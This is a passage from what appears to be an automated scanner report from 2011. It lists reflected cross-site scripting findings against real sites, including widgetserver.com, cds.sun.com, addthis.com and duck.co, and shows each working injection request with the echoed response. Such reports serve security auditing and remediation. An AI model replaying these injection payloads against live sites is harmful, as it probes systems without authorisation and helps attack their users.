Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id1abe0<img%20src%3da%20onerror%3dalert(1)>6a7add9aecc/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","fif":"aol","id1abe0<img src=a onerror=alert(1)>6a7add9aecc":"8f8e2793-e99e-41bf-8b75-95ef3e434575"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/
...[SNIP]...

3.36. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e4345753ffef<img%20src%3da%20onerror%3dalert(1)>0560571b3eb/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56534


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e4345753ffef<img src=a onerror=alert(1)>0560571b3eb","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0
...[SNIP]...

3.37. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http:33b85<img%20src%3da%20onerror%3dalert(1)>c54be653d5e//at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:16 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http:33b85<img src=a onerror=alert(1)>c54be653d5e//at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:6013
...[SNIP]...

3.38. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com37922<img%20src%3da%20onerror%3dalert(1)>f402d1ff062/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:20 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com37922<img src=a onerror=alert(1)>f402d1ff062/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:6
...[SNIP]...

3.39. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cds.sun.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1 HTTP/1.1
Host: cds.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:28:33 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 20208
Set-Cookie: sid=prDf2DxIwjnf2nEhKhFWJizn0QNA097gYG49cPqWI_fU2HjsA00=; path=/
Set-Cookie: pgid=yYdgaHqkkjVSR0EUPIQsoQ3D0000f9cuKriS; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: CDS_DETECT=detect; Domain=.sun.com; Path=/
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loo
...[SNIP]...
elimiter="&" parametername="goto" currenturl="https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1&ProductUUID=pGqJ_hCwj_AAAAEtB8oADqmS&ProductID=pGqJ_hCwj_AAAAEtB8oADqmS&Origin=ViewProductDetail-Start" -->
...[SNIP]...

3.40. https://client.trafficshaping.com/signin [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://client.trafficshaping.com
Path:   /signin

Request

GET /signin?email=1b192"><script>alert(1)</script>32cca89645832eced&password=&action=login HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: http://trafficshaping.com/
Cache-Control: max-age=0
Origin: http://trafficshaping.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:48 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:44:47 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 4659

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>TrafficShaping - Sign into Your Account</title>
<meta name="description" conten
...[SNIP]...
<input type="text" size="30" name="email" value="1b192"><script>alert(1)</script>32cca89645832eced" />
...[SNIP]...

3.41. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%0070e78<a>271d7883f11/2006/03/faster HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:07 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>271d7883f11/">weblog%0070e78<a>271d7883f11</a>
...[SNIP]...

3.42. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00dcea7"><script>alert(1)</script>512fbcc591d/2006/03/faster HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:06 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00dcea7"><script>alert(1)</script>512fbcc591d/2006/">
...[SNIP]...

3.43. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/faster

Request

GET /weblog/2006/03/fasterc01ec<a>2a3ca83c34f HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:17 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 26 Feb 2011 23:20:17 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/fasterc01ec<a>2a3ca83c34f</h1>
...[SNIP]...

3.44. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%0078f44"><script>alert(1)</script>c42523ab52d/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:49 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%0078f44"><script>alert(1)</script>c42523ab52d/2006/">
...[SNIP]...

3.45. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00fa627<a>784e947c10e/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:50 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>784e947c10e/">weblog%00fa627<a>784e947c10e</a>
...[SNIP]...

3.46. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Request

GET /weblog/2006/06/againf526a<a>bc4d18aee79/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:21:27 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 26 Feb 2011 23:21:28 GMT
Last-Modified: Sat, 26 Feb 2011 23:21:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/againf526a<a>bc4d18aee79/</h1>
...[SNIP]...

3.47. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Request

GET /weblog/2006/06/again/?d8539"><script>alert(1)</script>90e6230aa36=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:07 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sat, 26 Feb 2011 23:20:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 214711

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?d8539\"><script>alert(1)</script>90e6230aa36=1#preview" method="post">
...[SNIP]...

3.48. http://ds.addthis.com/red/psi/sites/www.capgemini.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.capgemini.com/p.json

Request

GET /red/psi/sites/www.capgemini.com/p.json?callback=_ate.ad.hpre135a<script>alert(1)</script>61e83256a55&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.capgemini.com%2Fmy-capgemini%2F&1ku1seo HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298824784.60|1297806627.66; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 290
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 28 Feb 2011 17:51:50 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 30 Mar 2011 17:51:50 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298915510.60|1297806627.66; Domain=.addthis.com; Expires=Wed, 27-Feb-2013 02:56:51 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 28 Feb 2011 17:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 17:51:50 GMT
Connection: close

_ate.ad.hpre135a<script>alert(1)</script>61e83256a55({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.capgemini.com%2fmy-capgemini%2f"],"segments" : ["60"],"loc": "MjAwMD
...[SNIP]...

3.49. http://ds.addthis.com/red/psi/sites/www.virtusa.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.virtusa.com/p.json

Request

GET /red/psi/sites/www.virtusa.com/p.json?callback=_ate.ad.hprf3a3a<script>alert(1)</script>5c36cbdaef9&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.virtusa.com%2Fpractices%2Fsoftware-testing%2Ftools-expertise.asp&ref=http%3A%2F%2Fwww.virtusa.com%2Fpractices%2Fsoftware-testing%2F&1t0xsuh HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298915503.60|1297806627.66; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Mar 2011 13:41:52 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 31 Mar 2011 13:41:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 01 Mar 2011 13:41:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 01 Mar 2011 13:41:52 GMT
Connection: close

_ate.ad.hprf3a3a<script>alert(1)</script>5c36cbdaef9({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

3.50. http://duck.co/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /

Request

GET /?b0edc"><script>alert(1)</script>49b41fe65db=1 HTTP/1.1
Host: duck.co
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/spread.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
